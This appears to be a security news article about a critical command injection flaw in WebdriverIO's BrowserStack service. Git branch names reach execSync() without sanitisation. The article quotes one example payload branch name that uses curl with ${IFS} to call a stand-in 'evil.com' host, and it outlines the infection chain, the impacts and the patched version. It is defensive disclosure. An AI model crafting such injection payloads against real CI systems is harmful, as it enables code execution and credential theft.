A critical security vulnerability has been found in WebdriverIO, a popular open-source test automation framework used for end-to-end and component testing. The flaw, tracked as CVE-2026-25244, carries a CVSS score of 9.8, signaling a “Critical” risk that could allow attackers to seize control of developer machines and build servers.
The issue resides specifically within the @wdio/browserstack-service package. It is a classic Command Injection vulnerability that occurs during test orchestration when the framework attempts to process git metadata.
The root cause is surprisingly simple: user-controlled git branch names are directly interpolated into shell commands via execSync() without any prior sanitization.
“User-controlled git branch names are directly interpolated into execSync() calls without sanitization. Git allows branch names to contain special characters that can be used for command injection,” the advisory explains.
To exploit this, an attacker doesn’t need a complex exploit, just a creatively named git branch. By creating a branch with a name like main;curl${IFS}evil.com/evil.sh, an attacker can trick the system into executing arbitrary code. The ${IFS} is there because git refuses whitespace in ref names: the shell expands it to a space at run time, so the payload needs no literal space in the branch name.
The step-by-step infection chain:
- Preparation: An attacker creates a malicious repository containing a branch name with a shell payload.
- Configuration: WebdriverIO is configured to use this repository (often via testOrchestrationOptions.runSmartSelection).
- Extraction: The framework runs getGitMetadataForAISelection() and pulls the malicious branch name.
- Injection: The unsanitized name is dropped into a shell command.
- Execution: The shell interprets the special characters (like ;) and runs the attacker’s commands instead of just checking the git diff.
Because WebdriverIO is a staple in CI/CD pipelines, the reach of this vulnerability is extensive. Successful exploitation can lead to:
- Remote Code Execution (RCE): Complete takeover of build servers or local developer environments.
- Data Exfiltration: Theft of sensitive source code, SSH keys, and configuration files.
- Credential Theft: Exposure of environment variables and CI/CD secrets.
- Supply Chain Attacks: The ability to modify build artifacts before they reach production.
Security researchers have identified the vulnerable code in the helpers.ts file of the BrowserStack service. If your team uses WebdriverIO for browser-based automation, you must check your versions immediately.
- Affected Versions: All versions up to and including 9.23.2.
- The Fix: Update to 9.24.0 or later.